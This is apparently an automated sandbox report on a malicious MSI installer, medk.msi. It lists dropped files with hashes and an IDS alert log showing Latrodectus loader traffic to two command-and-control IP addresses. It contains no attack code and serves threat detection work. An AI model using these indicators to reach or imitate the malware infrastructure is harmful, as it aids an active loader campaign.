                                                                                                                                          SSDEEP:6144:YMvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO17:YMvZx0FlS68zBQSncb4ZPQTpAjZxqO17
                                                                                                                                          MD5:69BFAE364F0238366C696EED384C7267
                                                                                                                                          SHA1:297D315A73112492E3CDD752DA82B7622FD72730
                                                                                                                                          SHA-256:26C13BEAD028EDE8A9E2D0F0DF8DCA6934405ED4F89407045D5A8C89005E6A2F
                                                                                                                                          SHA-512:F3EA5081B0923F123BD8880FF90531E3AE2B8D82A8DBB0A008704644DFCCB8182CE764FB4C461BF358AB61DCD34EB74CBE7AEC85D2AA5B6BAD4A440FA1D84A44
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:...@IXOS.@.....@.bmY.@.....@.....@.....@.....@.....@......&.{5AB6B0C5-5CD6-4CF7-ABF4-4E467A0D78CE}..MiddleTown..medk.msi.@.....@C....@.....@........&.{B4021E8B-3405-4502-A951-957A46D23C96}.....@.....@.....@.....@.......@.....@.....@.......@......MiddleTown......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}6.C:\Users\user\AppData\Roaming\MSER LTD\MiddleTown\.@.......@.....@.....@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}(.01:\Software\MSER LTD\MiddleTown\Version.@.......@.....@.....@......&.{C38A4B2A-9F83-4A9D-8505-10020DD6ABA7}).C:\Users\user\AppData\Roaming\tab.dll.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".6.C:\Users\user\AppData\Roaming\MSER LTD\MiddleTown\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]...@.....@.....@......".C:\Users\
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):399328
                                                                                                                                          Entropy (8bit):6.589290025452677
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:gMvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO1:gMvZx0FlS68zBQSncb4ZPQTpAjZxqO1
                                                                                                                                          MD5:B9545ED17695A32FACE8C3408A6A3553
                                                                                                                                          SHA1:F6C31C9CD832AE2AEBCD88E7B2FA6803AE93FC83
                                                                                                                                          SHA-256:1E0E63B446EECF6C9781C7D1CAE1F46A3BB31654A70612F71F31538FB4F4729A
                                                                                                                                          SHA-512:F6D6DC40DCBA5FF091452D7CC257427DCB7CE2A21816B4FEC2EE249E63246B64667F5C4095220623533243103876433EF8C12C9B612C0E95FDFFFE41D1504E04
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):20480
                                                                                                                                          Entropy (8bit):1.1616295808993868
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:JSbX72FjgAGiLIlHVRpzh/7777777777777777777777777vDHFh6Afrp01l0i8Q:JqQI53j6Afu8F
                                                                                                                                          MD5:35CBBBE24CE0DB47ABB34B773B84A3C5
                                                                                                                                          SHA1:DFD773A0513DD7A557F3E523906E59CBB1809F19
                                                                                                                                          SHA-256:1D833DEB3188B4E1F5157A437FAC11010BB8DD27E568BB326B49B0D1BC0E9C86
                                                                                                                                          SHA-512:77CEFCE6117F3EC4B91F75CCFC77BB2D737FCED21EC63E4BDD39D872D0B555ED815F0B31F1AEB748FE4952B24EFEBB2FDC8A10F46634B45460A5326CE22E7113
                                                                                                                                          Malicious:false
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):20480
                                                                                                                                          Entropy (8bit):1.5347164038953434
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:r8PhGuRc06WXJeFT5/ZA92StAEbCys9SBToeU:ShG11FTfAobwCJZ
                                                                                                                                          MD5:DF8487306CE77B20AC6A183650D05BF3
                                                                                                                                          SHA1:5C65B32BAB350284095FAF3F5BA1215D46717FAA
                                                                                                                                          SHA-256:17609D8E1E76F37DD15364BD0B27CFB7BF258069B4406C64D977CBFA8D70F6E9
                                                                                                                                          SHA-512:10CA1BCBD3D4A6D4794DD323149FA6F12FE57AA3DB65B064C5D1630F3946708AD6C383DFA4E7BFD3D781B1C69720515F8AD48DE2950969DA6A99F3CF2261A6B2
                                                                                                                                          Malicious:false
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):360001
                                                                                                                                          Entropy (8bit):5.362993320142039
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgau3:zTtbmkExhMJCIpES
                                                                                                                                          MD5:5D857E6132FB1F927D7CDEB770961986
                                                                                                                                          SHA1:983BC1F7C377DD2C68B0AD1FCF9921F945C99BFC
                                                                                                                                          SHA-256:95405CA58DFC5DB762B9A370B0CC797632E4EEC95EF6A8D91027A0AFA7FB360B
                                                                                                                                          SHA-512:85DFA77BAEB8F74EB189A139A114876EABB7F27D9E21860EECCEB4B6737574D5F299C3B64A3A47A5831B365B852117C357B26779803F5690957837D8EECA1F3A
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):32768
                                                                                                                                          Entropy (8bit):1.232857043115419
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:EzOu3O+CFXJfT5nZA92StAEbCys9SBToeU:eOX3TnAobwCJZ
                                                                                                                                          MD5:DFF5FB60C141A0789C0CEF8B9AC5003A
                                                                                                                                          SHA1:81203C2F6F86C1801395DB88C8076C24254F0752
                                                                                                                                          SHA-256:71BC3B148FE4407AD8A57900C4BC8590FAFB2EBFCD87925051B327BC0EF51C11
                                                                                                                                          SHA-512:536D34776A8844784C1606387316DE1763FDCBABBAB8FDAF732D66E7BD182119B973B7464EAD08D27CD0A4B15D02DD8674DB5D4D67659FF4F99C430B289954F8
                                                                                                                                          Malicious:false
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):73728
                                                                                                                                          Entropy (8bit):0.12699872131171566
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:XIgmrlTxkjyipVkj4kjyipVkjAAEVkyjCysVgwGHGc+KV:XUrlTXS7StAEbCys9cdV
                                                                                                                                          MD5:A1CE4CA213F54A0FF7B3DACF158F2517
                                                                                                                                          SHA1:3DA5297AEF9C725EFF62D2CD8D06A64FB77F54E1
                                                                                                                                          SHA-256:A40AF882DA535E7FCA1E6553ABFF88F3A966059477E3B563078E0F1B968F923F
                                                                                                                                          SHA-512:1556C9079C460F4097FC70C8518F667D75B055477ECBF5EA22559E0F734232E38DCF6540410F73E182674175C26B31F8C15C32C4C64837631F0DE16355821D5F
                                                                                                                                          Malicious:false
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):512
                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3::
                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                          Malicious:false
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):20480
                                                                                                                                          Entropy (8bit):1.5347164038953434
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:r8PhGuRc06WXJeFT5/ZA92StAEbCys9SBToeU:ShG11FTfAobwCJZ
                                                                                                                                          MD5:DF8487306CE77B20AC6A183650D05BF3
                                                                                                                                          SHA1:5C65B32BAB350284095FAF3F5BA1215D46717FAA
                                                                                                                                          SHA-256:17609D8E1E76F37DD15364BD0B27CFB7BF258069B4406C64D977CBFA8D70F6E9
                                                                                                                                          SHA-512:10CA1BCBD3D4A6D4794DD323149FA6F12FE57AA3DB65B064C5D1630F3946708AD6C383DFA4E7BFD3D781B1C69720515F8AD48DE2950969DA6A99F3CF2261A6B2
                                                                                                                                          Malicious:false
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):512
                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3::
                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                          Malicious:false
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):32768
                                                                                                                                          Entropy (8bit):1.232857043115419
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:EzOu3O+CFXJfT5nZA92StAEbCys9SBToeU:eOX3TnAobwCJZ
                                                                                                                                          MD5:DFF5FB60C141A0789C0CEF8B9AC5003A
                                                                                                                                          SHA1:81203C2F6F86C1801395DB88C8076C24254F0752
                                                                                                                                          SHA-256:71BC3B148FE4407AD8A57900C4BC8590FAFB2EBFCD87925051B327BC0EF51C11
                                                                                                                                          SHA-512:536D34776A8844784C1606387316DE1763FDCBABBAB8FDAF732D66E7BD182119B973B7464EAD08D27CD0A4B15D02DD8674DB5D4D67659FF4F99C430B289954F8
                                                                                                                                          Malicious:false
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):32768
                                                                                                                                          Entropy (8bit):0.06841213452055567
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOhB+zAfEoVky6l0t/:2F0i8n0itFzDHFh6Afu01
                                                                                                                                          MD5:2DE69A9759A7B86DD64B57CD981F6D1D
                                                                                                                                          SHA1:8A4F79A3E2A048DC9C3AF5AAC27D105621A63E49
                                                                                                                                          SHA-256:F18F8AACCDD5D086414CEF2DB41E86F390100424A8E2F4460924AB60723D4E22
                                                                                                                                          SHA-512:61A6EC8C8E6ABB95E7E21ABCF9B2B749D1D212E4F5CB36580CC0DDC335433BD3113B741E931944BABC736603316852A100E72398D928591554C039643B9AEFC8
                                                                                                                                          Malicious:false
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):20480
                                                                                                                                          Entropy (8bit):1.5347164038953434
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:r8PhGuRc06WXJeFT5/ZA92StAEbCys9SBToeU:ShG11FTfAobwCJZ
                                                                                                                                          MD5:DF8487306CE77B20AC6A183650D05BF3
                                                                                                                                          SHA1:5C65B32BAB350284095FAF3F5BA1215D46717FAA
                                                                                                                                          SHA-256:17609D8E1E76F37DD15364BD0B27CFB7BF258069B4406C64D977CBFA8D70F6E9
                                                                                                                                          SHA-512:10CA1BCBD3D4A6D4794DD323149FA6F12FE57AA3DB65B064C5D1630F3946708AD6C383DFA4E7BFD3D781B1C69720515F8AD48DE2950969DA6A99F3CF2261A6B2
                                                                                                                                          Malicious:false
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):512
                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3::
                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                          Malicious:false
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):512
                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3::
                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                          Malicious:false
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):512
                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3::
                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                          Malicious:false
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):32768
                                                                                                                                          Entropy (8bit):1.232857043115419
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:EzOu3O+CFXJfT5nZA92StAEbCys9SBToeU:eOX3TnAobwCJZ
                                                                                                                                          MD5:DFF5FB60C141A0789C0CEF8B9AC5003A
                                                                                                                                          SHA1:81203C2F6F86C1801395DB88C8076C24254F0752
                                                                                                                                          SHA-256:71BC3B148FE4407AD8A57900C4BC8590FAFB2EBFCD87925051B327BC0EF51C11
                                                                                                                                          SHA-512:536D34776A8844784C1606387316DE1763FDCBABBAB8FDAF732D66E7BD182119B973B7464EAD08D27CD0A4B15D02DD8674DB5D4D67659FF4F99C430B289954F8
                                                                                                                                          Malicious:false
                                                                                                                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {B4021E8B-3405-4502-A951-957A46D23C96}, Number of Words: 10, Subject: MiddleTown, Author: MSER LTD, Name of Creating Application: MiddleTown, Template: ;1033, Comments: This installer database contains the logic and data required to install MiddleTown., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                                                                          Entropy (8bit):7.438035416775101
                                                                                                                                          TrID:
                                                                                                                                          • Windows SDK Setup Transform Script (63028/2) 47.91%
                                                                                                                                          • Microsoft Windows Installer (60509/1) 46.00%
                                                                                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 6.09%
                                                                                                                                          File name:medk.msi
                                                                                                                                          File size:2'131'456 bytes
                                                                                                                                          MD5:8cb04bf931a19fa0ae1bd7235180dd4a
                                                                                                                                          SHA1:dfc980a827dbde294ae9fa6e63545d1d57344e96
                                                                                                                                          SHA256:dfff1a07429ff9585f3dab9c78b501174e7c326e1fb95c5234368071b5426768
                                                                                                                                          SHA512:58f1661d689aaa9391f04e086db490693f83b70e068ca10b20cff6f87979a8804aa9f054ac961af06c4b7b17fd88b1912774b2eb3d16b9df8e7a4ed9bb3c0a29
                                                                                                                                          SSDEEP:49152:F943YhW8zBQSc0ZnSKBZKumZr7Apj3Y+7jHplNa:6YY0Zn3K/Al3dXHpra
                                                                                                                                          TLSH:69A5E12273C6C537C9AE01307A1AD66A547DFCA70B3140DBA3C8292EAD745C16739FA7
                                                                                                                                          Icon Hash:2d2e3797b32b2b99
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-13T18:20:20.516009+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.175.87.197 | 443 | 192.168.2.6 | 49754 | TCP
2024-11-13T18:20:58.427119+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.175.87.197 | 443 | 192.168.2.6 | 49956 | TCP
2024-11-13T18:21:35.289353+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49988 | 104.21.92.105 | 443 | TCP
2024-11-13T18:21:35.325555+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 49988 | 104.21.92.105 | 443 | TCP
2024-11-13T18:21:36.742312+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49989 | 104.21.15.162 | 443 | TCP
2024-11-13T18:21:36.745751+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 49989 | 104.21.15.162 | 443 | TCP
2024-11-13T18:21:39.299333+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49990 | 104.21.92.105 | 443 | TCP
2024-11-13T18:21:39.300933+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 49990 | 104.21.92.105 | 443 | TCP
2024-11-13T18:21:40.716651+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49991 | 104.21.15.162 | 443 | TCP
2024-11-13T18:21:40.718248+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 49991 | 104.21.15.162 | 443 | TCP
2024-11-13T18:21:42.395163+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49992 | 104.21.92.105 | 443 | TCP
2024-11-13T18:21:42.396983+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 49992 | 104.21.92.105 | 443 | TCP
2024-11-13T18:21:43.584276+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49993 | 104.21.15.162 | 443 | TCP
2024-11-13T18:21:43.585814+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 49993 | 104.21.15.162 | 443 | TCP
2024-11-13T18:21:45.443244+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49994 | 104.21.92.105 | 443 | TCP
2024-11-13T18:21:45.444884+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 49994 | 104.21.92.105 | 443 | TCP
2024-11-13T18:21:47.397878+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49995 | 104.21.15.162 | 443 | TCP
2024-11-13T18:21:47.399255+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 49995 | 104.21.15.162 | 443 | TCP
2024-11-13T18:21:48.622876+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49996 | 104.21.92.105 | 443 | TCP
2024-11-13T18:21:48.624530+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 49996 | 104.21.92.105 | 443 | TCP
2024-11-13T18:21:50.027586+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49997 | 104.21.15.162 | 443 | TCP
2024-11-13T18:21:50.029215+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 49997 | 104.21.15.162 | 443 | TCP
2024-11-13T18:21:51.751655+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49998 | 104.21.92.105 | 443 | TCP
2024-11-13T18:21:51.753617+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 49998 | 104.21.92.105 | 443 | TCP
2024-11-13T18:21:54.029296+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49999 | 104.21.15.162 | 443 | TCP
2024-11-13T18:21:55.239147+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50000 | 104.21.92.105 | 443 | TCP
2024-11-13T18:21:55.240793+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50000 | 104.21.92.105 | 443 | TCP
2024-11-13T18:21:56.848285+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50001 | 104.21.15.162 | 443 | TCP
2024-11-13T18:21:56.851903+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50001 | 104.21.15.162 | 443 | TCP
2024-11-13T18:21:58.482924+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50003 | 104.21.92.105 | 443 | TCP
2024-11-13T18:21:58.484908+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50003 | 104.21.92.105 | 443 | TCP
2024-11-13T18:21:59.983991+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50004 | 104.21.15.162 | 443 | TCP
2024-11-13T18:21:59.985634+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50004 | 104.21.15.162 | 443 | TCP
2024-11-13T18:22:00.966575+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50005 | 104.21.92.105 | 443 | TCP
2024-11-13T18:22:00.968674+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50005 | 104.21.92.105 | 443 | TCP
2024-11-13T18:22:01.861079+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50006 | 104.21.15.162 | 443 | TCP
2024-11-13T18:22:01.880801+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50006 | 104.21.15.162 | 443 | TCP
2024-11-13T18:22:02.912371+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50007 | 104.21.92.105 | 443 | TCP
2024-11-13T18:22:02.913859+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50007 | 104.21.92.105 | 443 | TCP
2024-11-13T18:22:04.419792+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50008 | 104.21.15.162 | 443 | TCP
2024-11-13T18:22:04.427996+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50008 | 104.21.15.162 | 443 | TCP
2024-11-13T18:22:06.671027+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50010 | 104.21.92.105 | 443 | TCP
2024-11-13T18:22:06.697900+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50010 | 104.21.92.105 | 443 | TCP
2024-11-13T18:22:08.316987+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50011 | 104.21.15.162 | 443 | TCP
2024-11-13T18:22:08.318470+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50011 | 104.21.15.162 | 443 | TCP
2024-11-13T18:22:09.788113+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50012 | 104.21.92.105 | 443 | TCP
2024-11-13T18:22:09.789779+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50012 | 104.21.92.105 | 443 | TCP
2024-11-13T18:22:11.153189+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50013 | 104.21.15.162 | 443 | TCP
2024-11-13T18:22:11.155356+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50013 | 104.21.15.162 | 443 | TCP
2024-11-13T18:22:12.681683+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50014 | 104.21.92.105 | 443 | TCP
2024-11-13T18:22:12.683403+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50014 | 104.21.92.105 | 443 | TCP
2024-11-13T18:22:14.294877+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50015 | 104.21.15.162 | 443 | TCP
2024-11-13T18:22:14.296434+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50015 | 104.21.15.162 | 443 | TCP
2024-11-13T18:22:15.982040+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50016 | 104.21.92.105 | 443 | TCP
2024-11-13T18:22:15.983549+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50016 | 104.21.92.105 | 443 | TCP
2024-11-13T18:22:17.325529+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50017 | 104.21.15.162 | 443 | TCP
2024-11-13T18:22:17.331157+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50017 | 104.21.15.162 | 443 | TCP
2024-11-13T18:22:18.397920+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50018 | 104.21.92.105 | 443 | TCP
